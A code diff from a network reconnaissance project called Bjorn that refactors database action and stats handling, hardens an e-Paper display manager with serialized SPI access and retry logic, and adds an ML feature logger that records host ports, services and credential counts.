# Removed __del__ as it can cause circular reference leaks and is not guaranteed to run.
# Lifecycle should be managed by explicit close() calls.
# Internal helper methods used by modules # Internal helper methods used by modules
def _table_exists(self, name: str) -> bool: def _table_exists(self, name: str) -> bool:

View File

@@ -162,7 +162,8 @@ class ActionOps:
b_rate_limit = COALESCE(excluded.b_rate_limit, actions.b_rate_limit), b_rate_limit = COALESCE(excluded.b_rate_limit, actions.b_rate_limit),
b_stealth_level = COALESCE(excluded.b_stealth_level, actions.b_stealth_level), b_stealth_level = COALESCE(excluded.b_stealth_level, actions.b_stealth_level),
b_risk_level = COALESCE(excluded.b_risk_level, actions.b_risk_level), b_risk_level = COALESCE(excluded.b_risk_level, actions.b_risk_level),
b_enabled = COALESCE(excluded.b_enabled, actions.b_enabled), -- Keep persisted enable/disable state from DB across restarts.
b_enabled = actions.b_enabled,
b_args = COALESCE(excluded.b_args, actions.b_args), b_args = COALESCE(excluded.b_args, actions.b_args),
b_name = COALESCE(excluded.b_name, actions.b_name), b_name = COALESCE(excluded.b_name, actions.b_name),
b_description = COALESCE(excluded.b_description, actions.b_description), b_description = COALESCE(excluded.b_description, actions.b_description),
@@ -218,8 +219,10 @@ class ActionOps:
WHERE id = 1 WHERE id = 1
""", (action_count_row['cnt'],)) """, (action_count_row['cnt'],))
# Invalidate cache so callers immediately see fresh definitions
type(self).get_action_definition.cache_clear()
logger.info(f"Synchronized {len(actions)} actions") logger.info(f"Synchronized {len(actions)} actions")
def list_actions(self): def list_actions(self):
"""List all action definitions ordered by class name""" """List all action definitions ordered by class name"""
return self.base.query("SELECT * FROM actions ORDER BY b_class;") return self.base.query("SELECT * FROM actions ORDER BY b_class;")
@@ -261,23 +264,6 @@ class ActionOps:
}) })
return out return out
# def list_action_cards(self) -> list[dict]:
# """Lightweight descriptor of actions for card-based UIs"""
# rows = self.base.query("""
# SELECT b_class, b_enabled
# FROM actions
# ORDER BY b_class;
# """)
# out = []
# for r in rows:
# cls = r["b_class"]
# out.append({
# "name": cls,
# "image": f"/actions/actions_icons/{cls}.png",
# "enabled": int(r.get("b_enabled", 1) or 1),
# })
# return out
@lru_cache(maxsize=32) @lru_cache(maxsize=32)
def get_action_definition(self, b_class: str) -> Optional[Dict[str, Any]]: def get_action_definition(self, b_class: str) -> Optional[Dict[str, Any]]:
"""Cached lookup of an action definition by class name""" """Cached lookup of an action definition by class name"""

View File

@@ -71,10 +71,8 @@ class StatsOps:
def get_stats(self) -> Dict[str, int]: def get_stats(self) -> Dict[str, int]:
"""Compatibility alias to retrieve stats; ensures the singleton row exists""" """Compatibility alias to retrieve stats; ensures the singleton row exists"""
self.ensure_stats_initialized()
row = self.base.query("SELECT total_open_ports, alive_hosts_count, all_known_hosts_count, vulnerabilities_count FROM stats WHERE id=1;") row = self.base.query("SELECT total_open_ports, alive_hosts_count, all_known_hosts_count, vulnerabilities_count FROM stats WHERE id=1;")
if not row:
self.ensure_stats_initialized()
row = self.base.query("SELECT total_open_ports, alive_hosts_count, all_known_hosts_count, vulnerabilities_count FROM stats WHERE id=1;")
r = row[0] r = row[0]
return { return {
"total_open_ports": int(r["total_open_ports"]), "total_open_ports": int(r["total_open_ports"]),

View File

@@ -22,6 +22,7 @@ class StudioOps:
self.base.execute(""" self.base.execute("""
CREATE TABLE IF NOT EXISTS actions_studio ( CREATE TABLE IF NOT EXISTS actions_studio (
b_class TEXT PRIMARY KEY, b_class TEXT PRIMARY KEY,
b_priority INTEGER DEFAULT 50,
studio_x REAL, studio_x REAL,
studio_y REAL, studio_y REAL,
studio_locked INTEGER DEFAULT 0, studio_locked INTEGER DEFAULT 0,
@@ -31,6 +32,9 @@ class StudioOps:
); );
""") """)
# Migration: ensure b_priority exists on pre-existing databases
self.base._ensure_column("actions_studio", "b_priority", "b_priority INTEGER DEFAULT 50")
# Studio edges (relationships between actions) # Studio edges (relationships between actions)
self.base.execute(""" self.base.execute("""
CREATE TABLE IF NOT EXISTS studio_edges ( CREATE TABLE IF NOT EXISTS studio_edges (
@@ -255,6 +259,7 @@ class StudioOps:
self.base.execute(""" self.base.execute("""
CREATE TABLE IF NOT EXISTS actions_studio ( CREATE TABLE IF NOT EXISTS actions_studio (
b_class TEXT PRIMARY KEY, b_class TEXT PRIMARY KEY,
b_priority INTEGER DEFAULT 50,
studio_x REAL, studio_x REAL,
studio_y REAL, studio_y REAL,
studio_locked INTEGER DEFAULT 0, studio_locked INTEGER DEFAULT 0,
@@ -282,10 +287,12 @@ class StudioOps:
- Insert missing b_class entries - Insert missing b_class entries
- Update NULL fields only (non-destructive) - Update NULL fields only (non-destructive)
""" """
# 1) Minimal table: PK + studio_* columns # 1) Minimal table: PK + studio_* columns (b_priority must be here so
# get_studio_actions() can ORDER BY it before _sync adds action columns)
self.base.execute(""" self.base.execute("""
CREATE TABLE IF NOT EXISTS actions_studio ( CREATE TABLE IF NOT EXISTS actions_studio (
b_class TEXT PRIMARY KEY, b_class TEXT PRIMARY KEY,
b_priority INTEGER DEFAULT 50,
studio_x REAL, studio_x REAL,
studio_y REAL, studio_y REAL,
studio_locked INTEGER DEFAULT 0, studio_locked INTEGER DEFAULT 0,

1273
display.py

File diff suppressed because it is too large Load Diff

View File

@@ -1,436 +1,259 @@
""" """
EPD Manager - Singleton manager for e-Paper display EPD Manager - singleton wrapper around Waveshare drivers.
FIXED VERSION: Added operation timeouts, better error recovery, thread safety Hardened for runtime stability:
- no per-operation worker-thread timeouts (prevents leaked stuck SPI threads)
- serialized SPI access
- bounded retry + recovery
- health metrics for monitoring
""" """
import threading
import importlib import importlib
import logging import threading
import time import time
from PIL import Image from PIL import Image
from logger import Logger from logger import Logger
logger = Logger(name="epd_manager.py", level=logging.DEBUG) logger = Logger(name="epd_manager.py")
# ============================================================================ DEBUG_MANAGER = False
# DEBUG CONFIGURATION
# ============================================================================
DEBUG_MANAGER = False # Set to True to enable EPD Manager debugging
def debug_log(message, level='debug'): def debug_log(message, level="debug"):
"""Conditional debug logging for manager""" if not DEBUG_MANAGER:
if DEBUG_MANAGER: return
if level == 'info': if level == "info":
logger.info(f"[EPD_MANAGER] {message}") logger.info(f"[EPD_MANAGER] {message}")
elif level == 'warning': elif level == "warning":
logger.warning(f"[EPD_MANAGER] {message}") logger.warning(f"[EPD_MANAGER] {message}")
elif level == 'error': elif level == "error":
logger.error(f"[EPD_MANAGER] {message}") logger.error(f"[EPD_MANAGER] {message}")
else: else:
logger.debug(f"[EPD_MANAGER] {message}") logger.debug(f"[EPD_MANAGER] {message}")
class EPDManager: class EPDManager:
"""
Singleton EPD Manager with robust timeout handling and error recovery
"""
_instance = None _instance = None
_lock = threading.Lock() # Global lock for all SPI access _instance_lock = threading.Lock()
_spi_lock = threading.RLock()
# Error handling configuration
MAX_CONSECUTIVE_ERRORS = 3 MAX_CONSECUTIVE_ERRORS = 3
RESET_COOLDOWN = 5.0 # seconds between hard resets RESET_COOLDOWN = 5.0
OPERATION_TIMEOUT = 15.0 # CRITICAL: max seconds for any EPD operation
INIT_TIMEOUT = 20.0 # Longer timeout for initialization
def __new__(cls, epd_type: str): def __new__(cls, epd_type: str):
if cls._instance is None: with cls._instance_lock:
debug_log("Creating new EPDManager instance", 'info') if cls._instance is None:
cls._instance = super().__new__(cls) cls._instance = super().__new__(cls)
cls._instance._init_driver(epd_type) cls._instance._initialized = False
else:
debug_log("Returning existing EPDManager instance", 'info')
return cls._instance return cls._instance
def _init_driver(self, epd_type: str): def __init__(self, epd_type: str):
"""Initialize EPD driver""" if self._initialized:
debug_log(f"Initializing driver: {epd_type}", 'info') if epd_type != self.epd_type:
logger.warning(
f"EPDManager already initialized with {self.epd_type}, "
f"ignoring requested type {epd_type}"
)
return
self.epd_type = epd_type self.epd_type = epd_type
self.epd = None
self.last_reset = time.time() self.last_reset = time.time()
self.error_count = 0 self.error_count = 0
self.last_error_time = 0 self.last_error_time = 0.0
self.operation_start_time = 0
self.total_operations = 0 self.total_operations = 0
self.successful_operations = 0 self.successful_operations = 0
self.last_operation_duration = 0.0
self.total_operation_duration = 0.0
self.timeout_count = 0 self.timeout_count = 0
self.recovery_attempts = 0
try: self.recovery_failures = 0
epd_module_name = f"resources.waveshare_epd.{self.epd_type}"
epd_module = importlib.import_module(epd_module_name)
self.epd = epd_module.EPD()
debug_log(f"EPD driver {self.epd_type} loaded successfully", 'info')
except Exception as e:
logger.error(f"Failed to load EPD driver {self.epd_type}: {e}")
raise
def _safe_call(self, func, *args, timeout=None, **kwargs): self._load_driver()
""" self._initialized = True
Execute EPD function with timeout and error handling
CRITICAL: Uses threading to implement timeout # ------------------------------------------------------------------ driver
"""
if timeout is None: def _load_driver(self):
timeout = self.OPERATION_TIMEOUT debug_log(f"Loading EPD driver {self.epd_type}", "info")
epd_module_name = f"resources.waveshare_epd.{self.epd_type}"
with EPDManager._lock: epd_module = importlib.import_module(epd_module_name)
self.epd = epd_module.EPD()
# ------------------------------------------------------------------ calls
def _safe_call(self, func, *args, **kwargs):
with EPDManager._spi_lock:
self.total_operations += 1 self.total_operations += 1
self.operation_start_time = time.time() started = time.monotonic()
try:
debug_log(f"Executing operation #{self.total_operations}: {func.__name__} (timeout={timeout}s)") result = func(*args, **kwargs)
except Exception as exc:
# Execute in separate thread to allow timeout
result_container = {'result': None, 'error': None, 'completed': False}
def execute_operation():
try:
result_container['result'] = func(*args, **kwargs)
result_container['completed'] = True
except Exception as e:
result_container['error'] = e
result_container['completed'] = True
operation_thread = threading.Thread(target=execute_operation, daemon=True)
operation_thread.start()
operation_thread.join(timeout=timeout)
operation_time = time.time() - self.operation_start_time
# Check if operation completed
if not result_container['completed']:
# TIMEOUT occurred
self.timeout_count += 1
self.error_count += 1 self.error_count += 1
logger.error(f"EPD operation TIMEOUT after {timeout}s (timeout #{self.timeout_count})") self.last_error_time = time.time()
logger.error(f"EPD operation failed ({func.__name__}): {exc}")
# Perform recovery if too many timeouts
if self.error_count >= self.MAX_CONSECUTIVE_ERRORS: if self.error_count < self.MAX_CONSECUTIVE_ERRORS:
return self._perform_recovery(func, args, kwargs, return self._simple_retry(func, args, kwargs, exc)
TimeoutError(f"Operation timed out after {timeout}s"))
else: return self._perform_recovery(func, args, kwargs, exc)
raise TimeoutError(f"EPD operation timed out after {timeout}s")
# Check if operation had an error
if result_container['error'] is not None:
self.error_count += 1
logger.error(f"EPD operation failed (error #{self.error_count}): {result_container['error']}")
debug_log(f"Failed operation took {operation_time:.3f}s", 'error')
# Check if we need to perform recovery
if self.error_count >= self.MAX_CONSECUTIVE_ERRORS:
return self._perform_recovery(func, args, kwargs, result_container['error'])
else:
# Simple retry without full reset
return self._simple_retry(func, args, kwargs, result_container['error'])
# Operation successful
self.successful_operations += 1 self.successful_operations += 1
self.error_count = 0 self.error_count = 0
self.last_operation_duration = time.monotonic() - started
debug_log(f"Operation completed successfully in {operation_time:.3f}s", 'info') self.total_operation_duration += self.last_operation_duration
return result_container['result'] return result
def _simple_retry(self, func, args, kwargs, original_error): def _simple_retry(self, func, args, kwargs, original_error):
"""Attempt simple retry without full reset""" time.sleep(0.3)
debug_log("Attempting simple retry after error", 'warning')
try: try:
time.sleep(0.5) # Brief delay before retry result = func(*args, **kwargs)
self.successful_operations += 1
# Use shorter timeout for retry self.error_count = 0
result_container = {'result': None, 'error': None, 'completed': False} return result
except Exception as retry_error:
def execute_retry(): logger.error(f"EPD retry failed ({func.__name__}): {retry_error}")
try:
result_container['result'] = func(*args, **kwargs)
result_container['completed'] = True
except Exception as e:
result_container['error'] = e
result_container['completed'] = True
retry_thread = threading.Thread(target=execute_retry, daemon=True)
retry_thread.start()
retry_thread.join(timeout=self.OPERATION_TIMEOUT)
if result_container['completed'] and result_container['error'] is None:
debug_log("Simple retry successful", 'info')
self.error_count = 0
self.successful_operations += 1
return result_container['result']
# Retry failed
logger.error(f"Simple retry failed: {result_container.get('error', 'timeout')}")
raise original_error
except Exception as e:
logger.error(f"Simple retry failed: {e}")
raise original_error raise original_error
def _perform_recovery(self, func, args, kwargs, original_error): def _perform_recovery(self, func, args, kwargs, original_error):
"""Perform full recovery with hard reset""" now = time.time()
current_time = time.time() wait_s = max(0.0, self.RESET_COOLDOWN - (now - self.last_reset))
time_since_last_reset = current_time - self.last_reset if wait_s > 0:
time.sleep(wait_s)
debug_log(f"Too many errors ({self.error_count}), initiating recovery", 'warning')
self.recovery_attempts += 1
# Enforce cooldown between resets
if time_since_last_reset < self.RESET_COOLDOWN:
wait_time = self.RESET_COOLDOWN - time_since_last_reset
logger.warning(f"Reset cooldown active, waiting {wait_time:.1f}s")
time.sleep(wait_time)
# Attempt hard reset
try: try:
debug_log("Performing hard reset...", 'warning')
self.hard_reset() self.hard_reset()
result = func(*args, **kwargs)
self.successful_operations += 1
self.error_count = 0 self.error_count = 0
return result
# Retry operation after reset with timeout except Exception as exc:
debug_log("Retrying operation after hard reset") self.recovery_failures += 1
logger.critical(f"EPD recovery failed: {exc}")
result_container = {'result': None, 'error': None, 'completed': False} self.error_count = 0
raise original_error
def execute_after_reset():
try:
result_container['result'] = func(*args, **kwargs)
result_container['completed'] = True
except Exception as e:
result_container['error'] = e
result_container['completed'] = True
reset_retry_thread = threading.Thread(target=execute_after_reset, daemon=True)
reset_retry_thread.start()
reset_retry_thread.join(timeout=self.OPERATION_TIMEOUT)
if result_container['completed'] and result_container['error'] is None:
debug_log("Recovery successful", 'info')
self.successful_operations += 1
return result_container['result']
# Recovery failed
logger.critical(f"Recovery failed: {result_container.get('error', 'timeout')}")
except Exception as e:
logger.critical(f"Recovery failed catastrophically: {e}")
# Calculate success rate
if self.total_operations > 0:
success_rate = (self.successful_operations / self.total_operations) * 100
logger.error(f"EPD success rate: {success_rate:.1f}% "
f"({self.successful_operations}/{self.total_operations}), "
f"timeouts: {self.timeout_count}")
self.error_count = 0 # Reset to prevent infinite recovery attempts
raise original_error
def hard_reset(self): # -------------------------------------------------------------- public api
"""
Perform complete hardware and software reset with timeout protection
"""
debug_log("Starting hard reset sequence", 'warning')
reset_start = time.time()
try:
# Step 1: Clean shutdown of existing SPI connection
debug_log("Step 1: Closing existing SPI connection")
try:
if hasattr(self.epd, 'epdconfig'):
self.epd.epdconfig.module_exit()
time.sleep(0.5)
except Exception as e:
debug_log(f"Error during SPI shutdown: {e}", 'warning')
# Step 2: Hardware reset
debug_log("Step 2: Hardware reset")
try:
self.epd.reset()
time.sleep(0.2)
except Exception as e:
debug_log(f"Error during hardware reset: {e}", 'warning')
# Step 3: Reset initialization flags
debug_log("Step 3: Resetting initialization flags")
self.epd.is_initialized = False
if hasattr(self.epd, 'is_partial_configured'):
self.epd.is_partial_configured = False
# Step 4: Reinitialize SPI with timeout
debug_log("Step 4: Reinitializing SPI")
if hasattr(self.epd, 'epdconfig'):
def reinit_spi():
ret = self.epd.epdconfig.module_init()
if ret != 0:
raise RuntimeError("SPI reinitialization failed")
time.sleep(0.5)
reinit_thread = threading.Thread(target=reinit_spi, daemon=True)
reinit_thread.start()
reinit_thread.join(timeout=5.0)
if reinit_thread.is_alive():
raise TimeoutError("SPI reinitialization timed out")
# Step 5: Reinitialize EPD with timeout
debug_log("Step 5: Reinitializing EPD")
def reinit_epd():
self.epd.init()
epd_init_thread = threading.Thread(target=reinit_epd, daemon=True)
epd_init_thread.start()
epd_init_thread.join(timeout=self.INIT_TIMEOUT)
if epd_init_thread.is_alive():
raise TimeoutError("EPD reinitialization timed out")
# Update reset timestamp
self.last_reset = time.time()
reset_duration = self.last_reset - reset_start
logger.warning(f"EPD hard reset completed successfully in {reset_duration:.2f}s")
debug_log("Hard reset sequence complete", 'info')
except Exception as e:
logger.critical(f"Hard reset failed catastrophically: {e}")
raise
def check_health(self):
"""
Check EPD manager health status
Returns: dict with health metrics
"""
current_time = time.time()
uptime = current_time - self.last_reset
if self.total_operations > 0:
success_rate = (self.successful_operations / self.total_operations) * 100
else:
success_rate = 100.0
health = {
'uptime_seconds': uptime,
'total_operations': self.total_operations,
'successful_operations': self.successful_operations,
'success_rate': success_rate,
'consecutive_errors': self.error_count,
'timeout_count': self.timeout_count,
'last_reset': self.last_reset,
'is_healthy': self.error_count == 0 and success_rate > 95.0
}
debug_log(f"Health check: {health}", 'info')
return health
# ========================================================================
# Public API Methods with Timeout Protection
# ========================================================================
def init_full_update(self): def init_full_update(self):
"""Initialize EPD for full update mode""" return self._safe_call(self._init_full)
debug_log("API: init_full_update", 'info')
return self._safe_call(self._init_full, timeout=self.INIT_TIMEOUT)
def init_partial_update(self): def init_partial_update(self):
"""Initialize EPD for partial update mode""" return self._safe_call(self._init_partial)
debug_log("API: init_partial_update")
return self._safe_call(self._init_partial, timeout=self.INIT_TIMEOUT)
def display_partial(self, image): def display_partial(self, image):
"""Display image using partial update"""
debug_log("API: display_partial")
return self._safe_call(self._display_partial, image) return self._safe_call(self._display_partial, image)
def display_full(self, image): def display_full(self, image):
"""Display image using full update"""
debug_log("API: display_full", 'info')
return self._safe_call(self._display_full, image) return self._safe_call(self._display_full, image)
def clear(self): def clear(self):
"""Clear display"""
debug_log("API: clear", 'info')
return self._safe_call(self._clear) return self._safe_call(self._clear)
def sleep(self): def sleep(self):
"""Put display to sleep""" return self._safe_call(self._sleep)
debug_log("API: sleep", 'info')
return self._safe_call(self._sleep, timeout=5.0)
# ======================================================================== def check_health(self):
# Protected Implementation Methods uptime = time.time() - self.last_reset
# ======================================================================== success_rate = 100.0
avg_ms = 0.0
if self.total_operations > 0:
success_rate = (self.successful_operations / self.total_operations) * 100.0
avg_ms = (self.total_operation_duration / self.total_operations) * 1000.0
return {
"uptime_seconds": round(uptime, 3),
"total_operations": int(self.total_operations),
"successful_operations": int(self.successful_operations),
"success_rate": round(success_rate, 2),
"consecutive_errors": int(self.error_count),
"timeout_count": int(self.timeout_count),
"last_reset": self.last_reset,
"last_operation_duration_ms": round(self.last_operation_duration * 1000.0, 2),
"avg_operation_duration_ms": round(avg_ms, 2),
"recovery_attempts": int(self.recovery_attempts),
"recovery_failures": int(self.recovery_failures),
"is_healthy": self.error_count == 0,
}
# ------------------------------------------------------------- impl methods
def _init_full(self): def _init_full(self):
"""Initialize for full update (protected)"""
debug_log("Initializing full update mode")
if hasattr(self.epd, "FULL_UPDATE"): if hasattr(self.epd, "FULL_UPDATE"):
self.epd.init(self.epd.FULL_UPDATE) self.epd.init(self.epd.FULL_UPDATE)
elif hasattr(self.epd, "lut_full_update"): elif hasattr(self.epd, "lut_full_update"):
self.epd.init(self.epd.lut_full_update) self.epd.init(self.epd.lut_full_update)
else: else:
self.epd.init() self.epd.init()
debug_log("Full update mode initialized")
def _init_partial(self): def _init_partial(self):
"""Initialize for partial update (protected)"""
debug_log("Initializing partial update mode")
if hasattr(self.epd, "PART_UPDATE"): if hasattr(self.epd, "PART_UPDATE"):
self.epd.init(self.epd.PART_UPDATE) self.epd.init(self.epd.PART_UPDATE)
elif hasattr(self.epd, "lut_partial_update"): elif hasattr(self.epd, "lut_partial_update"):
self.epd.init(self.epd.lut_partial_update) self.epd.init(self.epd.lut_partial_update)
else: else:
self.epd.init() self.epd.init()
debug_log("Partial update mode initialized")
def _display_partial(self, image): def _display_partial(self, image):
"""Display using partial update (protected)"""
debug_log("Executing partial display")
if hasattr(self.epd, "displayPartial"): if hasattr(self.epd, "displayPartial"):
self.epd.displayPartial(self.epd.getbuffer(image)) self.epd.displayPartial(self.epd.getbuffer(image))
else: else:
debug_log("No displayPartial method, using standard display", 'warning')
self.epd.display(self.epd.getbuffer(image)) self.epd.display(self.epd.getbuffer(image))
def _display_full(self, image): def _display_full(self, image):
"""Display using full update (protected)"""
debug_log("Executing full display")
self.epd.display(self.epd.getbuffer(image)) self.epd.display(self.epd.getbuffer(image))
def _clear(self): def _clear(self):
"""Clear display (protected)"""
debug_log("Clearing display")
if hasattr(self.epd, "Clear"): if hasattr(self.epd, "Clear"):
self.epd.Clear() self.epd.Clear()
else: return
debug_log("No Clear method, displaying white image", 'warning')
w, h = self.epd.width, self.epd.height w, h = self.epd.width, self.epd.height
blank = Image.new("1", (w, h), 255) blank = Image.new("1", (w, h), 255)
try:
self._display_partial(blank) self._display_partial(blank)
finally:
blank.close()
def _sleep(self): def _sleep(self):
"""Put display to sleep (protected)"""
debug_log("Putting display to sleep")
if hasattr(self.epd, "sleep"): if hasattr(self.epd, "sleep"):
self.epd.sleep() self.epd.sleep()
else:
debug_log("No sleep method available", 'warning') def hard_reset(self, force: bool = False):
with EPDManager._spi_lock:
started = time.monotonic()
try:
if self.epd and hasattr(self.epd, "epdconfig"):
try:
self.epd.epdconfig.module_exit(cleanup=True)
except TypeError:
self.epd.epdconfig.module_exit()
except Exception as exc:
logger.warning(f"EPD module_exit during reset failed: {exc}")
self._load_driver()
# Validate the new driver with a full init.
if hasattr(self.epd, "FULL_UPDATE"):
self.epd.init(self.epd.FULL_UPDATE)
else:
self.epd.init()
self.last_reset = time.time()
self.error_count = 0
if force:
logger.warning(
f"EPD forced hard reset completed in {time.monotonic() - started:.2f}s"
)
else:
logger.warning(
f"EPD hard reset completed in {time.monotonic() - started:.2f}s"
)
except Exception as exc:
logger.critical(f"EPD hard reset failed: {exc}")
raise
### END OF FILE ### ### END OF FILE ###

762
feature_logger.py Normal file
View File

@@ -0,0 +1,762 @@
"""
feature_logger.py - Dynamic Feature Logging Engine for Bjorn
═══════════════════════════════════════════════════════════════════════════
Purpose:
Automatically capture ALL relevant features from action executions
for deep learning model training. No manual feature declaration needed.
Architecture:
- Automatic feature extraction from all data sources
- Time-series aggregation
- Network topology features
- Action success patterns
- Lightweight storage optimized for Pi Zero
- Export format ready for deep learning
Author: Bjorn Team (Enhanced AI Version)
Version: 2.0.0
"""
import json
import time
import hashlib
import random
from datetime import datetime, timedelta
from typing import Dict, List, Any, Optional, Tuple
from collections import defaultdict, deque
from logger import Logger
logger = Logger(name="feature_logger.py", level=20)
class FeatureLogger:
"""
Captures comprehensive features from network reconnaissance
and action execution for deep learning.
"""
def __init__(self, shared_data):
"""Initialize feature logger with database connection"""
self.shared_data = shared_data
self.db = shared_data.db
self._max_hosts_tracked = max(
64, int(getattr(self.shared_data, "ai_feature_hosts_limit", 512))
)
# Rolling windows for temporal features (memory efficient)
self.recent_actions = deque(maxlen=100)
self.host_history = defaultdict(lambda: deque(maxlen=50))
# Initialize feature tables
self._ensure_tables_exist()
logger.info("FeatureLogger initialized - auto-discovery mode enabled")
# ═══════════════════════════════════════════════════════════════════════
# DATABASE SCHEMA
# ═══════════════════════════════════════════════════════════════════════
def _ensure_tables_exist(self):
"""Create feature logging tables if they don't exist"""
try:
# Main feature log table
self.db.execute("""
CREATE TABLE IF NOT EXISTS ml_features (
id INTEGER PRIMARY KEY AUTOINCREMENT,
timestamp TEXT NOT NULL DEFAULT CURRENT_TIMESTAMP,
-- Identifiers
mac_address TEXT,
ip_address TEXT,
action_name TEXT,
-- Context features (JSON)
host_features TEXT, -- Vendor, ports, services, etc.
network_features TEXT, -- Topology, neighbors, subnets
temporal_features TEXT, -- Time patterns, sequences
action_features TEXT, -- Action-specific metadata
-- Outcome
success INTEGER,
duration_seconds REAL,
reward REAL,
-- Raw event data (for replay)
raw_event TEXT,
-- Consolidation status
consolidated INTEGER DEFAULT 0,
export_batch_id INTEGER
)
""")
# Index for fast queries
self.db.execute("""
CREATE INDEX IF NOT EXISTS idx_ml_features_mac
ON ml_features(mac_address, timestamp DESC)
""")
self.db.execute("""
CREATE INDEX IF NOT EXISTS idx_ml_features_consolidated
ON ml_features(consolidated, timestamp)
""")
# Aggregated features table (pre-computed for efficiency)
self.db.execute("""
CREATE TABLE IF NOT EXISTS ml_features_aggregated (
id INTEGER PRIMARY KEY AUTOINCREMENT,
computed_at TEXT NOT NULL DEFAULT CURRENT_TIMESTAMP,
mac_address TEXT,
time_window TEXT, -- 'hourly', 'daily', 'weekly'
-- Aggregated metrics
total_actions INTEGER,
success_rate REAL,
avg_duration REAL,
total_reward REAL,
-- Action distribution
action_counts TEXT, -- JSON: {action_name: count}
-- Discovery metrics
new_ports_found INTEGER,
new_services_found INTEGER,
credentials_found INTEGER,
-- Feature vector (for DL)
feature_vector TEXT, -- JSON array of numerical features
UNIQUE(mac_address, time_window, computed_at)
)
""")
# Export batches tracking
self.db.execute("""
CREATE TABLE IF NOT EXISTS ml_export_batches (
id INTEGER PRIMARY KEY AUTOINCREMENT,
created_at TEXT NOT NULL DEFAULT CURRENT_TIMESTAMP,
record_count INTEGER,
file_path TEXT,
status TEXT DEFAULT 'pending', -- pending, exported, transferred
notes TEXT
)
""")
logger.info("ML feature tables initialized")
except Exception as e:
logger.error(f"Failed to create ML tables: {e}")
# ═══════════════════════════════════════════════════════════════════════
# AUTOMATIC FEATURE EXTRACTION
# ═══════════════════════════════════════════════════════════════════════
def log_action_execution(
self,
mac_address: str,
ip_address: str,
action_name: str,
success: bool,
duration: float,
reward: float,
raw_event: Dict[str, Any]
):
"""
Log a complete action execution with automatically extracted features.
Args:
mac_address: Target MAC address
ip_address: Target IP address
action_name: Name of executed action
success: Whether action succeeded
duration: Execution time in seconds
reward: Calculated reward value
raw_event: Complete event data (for replay/debugging)
"""
try:
# Shield against missing MAC
if not mac_address:
logger.debug("Skipping ML log: missing MAC address")
return
# Extract features from multiple sources
host_features = self._extract_host_features(mac_address, ip_address)
network_features = self._extract_network_features(mac_address)
temporal_features = self._extract_temporal_features(mac_address, action_name)
action_features = self._extract_action_features(action_name, raw_event)
# Store in database
self.db.execute("""
INSERT INTO ml_features (
mac_address, ip_address, action_name,
host_features, network_features, temporal_features, action_features,
success, duration_seconds, reward, raw_event
)
VALUES (?, ?, ?, ?, ?, ?, ?, ?, ?, ?, ?)
""", (
mac_address, ip_address, action_name,
json.dumps(host_features),
json.dumps(network_features),
json.dumps(temporal_features),
json.dumps(action_features),
1 if success else 0,
duration,
reward,
json.dumps(raw_event)
))
# Update rolling windows
self.recent_actions.append({
'mac': mac_address,
'action': action_name,
'success': success,
'timestamp': time.time()
})
self.host_history[mac_address].append({
'action': action_name,
'success': success,
'timestamp': time.time()
})
self._prune_host_history()
logger.debug(
f"Logged features for {action_name} on {mac_address} "
f"(success={success}, features={len(host_features)}+{len(network_features)}+"
f"{len(temporal_features)}+{len(action_features)})"
)
# Prune old database records to save disk space (keep last 1000)
if random.random() < 0.05: # 5% chance to prune to avoid overhead every hit
self._prune_database_records()
except Exception as e:
logger.error(f"Failed to log action execution: {e}")
def _prune_host_history(self):
"""Bound host_history keys to avoid unbounded growth over very long runtimes."""
try:
current_size = len(self.host_history)
if current_size <= self._max_hosts_tracked:
return
overflow = current_size - self._max_hosts_tracked
ranked = []
for mac, entries in self.host_history.items():
if entries:
ranked.append((entries[-1]['timestamp'], mac))
else:
ranked.append((0.0, mac))
ranked.sort(key=lambda x: x[0]) # oldest first
for _, mac in ranked[:overflow]:
self.host_history.pop(mac, None)
except Exception:
pass
def _prune_database_records(self, limit: int = 1000):
"""Keep the ml_features table within a reasonable size limit."""
try:
self.db.execute(f"""
DELETE FROM ml_features
WHERE id NOT IN (
SELECT id FROM ml_features
ORDER BY timestamp DESC
LIMIT {limit}
)
""")
except Exception as e:
logger.debug(f"Failed to prune ml_features: {e}")
def _extract_host_features(self, mac: str, ip: str) -> Dict[str, Any]:
"""
Extract features about the target host.
Auto-discovers all relevant attributes from database.
"""
features = {}
try:
# Get host data
host = self.db.get_host_by_mac(mac)
if not host:
return features
# Basic identifiers (hashed for privacy if needed)
features['mac_hash'] = hashlib.md5(mac.encode()).hexdigest()[:8]
features['vendor_oui'] = mac[:8].upper() if mac else None
# Vendor classification
vendor = host.get('vendor', '')
features['vendor'] = vendor
features['vendor_category'] = self._categorize_vendor(vendor)
# Network interfaces
ips = [p.strip() for p in (host.get('ips', '') or '').split(';') if p.strip()]
features['ip_count'] = len(ips)
features['has_multiple_ips'] = len(ips) > 1
# Subnet classification
if ips:
features['subnet'] = '.'.join(ips[0].split('.')[:3]) + '.0/24'
features['is_private'] = self._is_private_ip(ips[0])
# Open ports
ports_str = host.get('ports', '') or ''
ports = [int(p) for p in ports_str.split(';') if p.strip().isdigit()]
features['port_count'] = len(ports)
features['ports'] = sorted(ports)[:20] # Limit to top 20
# Port profiles (auto-detect common patterns)
features['port_profile'] = self._detect_port_profile(ports)
features['has_ssh'] = 22 in ports
features['has_http'] = 80 in ports or 8080 in ports
features['has_https'] = 443 in ports
features['has_smb'] = 445 in ports
features['has_rdp'] = 3389 in ports
features['has_database'] = any(p in ports for p in [3306, 5432, 1433, 27017])
# Services detected
services = self._get_services_for_host(mac)
features['service_count'] = len(services)
features['services'] = services
# Hostnames
hostnames = [h.strip() for h in (host.get('hostnames', '') or '').split(';') if h.strip()]
features['hostname_count'] = len(hostnames)
if hostnames:
features['primary_hostname'] = hostnames[0]
features['hostname_hints'] = self._extract_hostname_hints(hostnames[0])
# First/last seen
features['first_seen'] = host.get('first_seen')
features['last_seen'] = host.get('last_seen')
# Calculate age
if host.get('first_seen'):
ts = host['first_seen']
if isinstance(ts, str):
try:
first_seen_dt = datetime.fromisoformat(ts)
except ValueError:
# Fallback for other formats if needed
first_seen_dt = datetime.now()
elif isinstance(ts, datetime):
first_seen_dt = ts
else:
first_seen_dt = datetime.now()
age_hours = (datetime.now() - first_seen_dt).total_seconds() / 3600
features['age_hours'] = round(age_hours, 2)
features['is_new'] = age_hours < 24
# Credentials found
creds = self._get_credentials_for_host(mac)
features['credential_count'] = len(creds)
features['has_credentials'] = len(creds) > 0
# OS fingerprinting hints
features['os_hints'] = self._guess_os(vendor, ports, hostnames)
except Exception as e:
logger.error(f"Error extracting host features: {e}")
return features
def _extract_network_features(self, mac: str) -> Dict[str, Any]:
"""
Extract network topology and relationship features.
Discovers patterns in the network structure.
"""
features = {}
try:
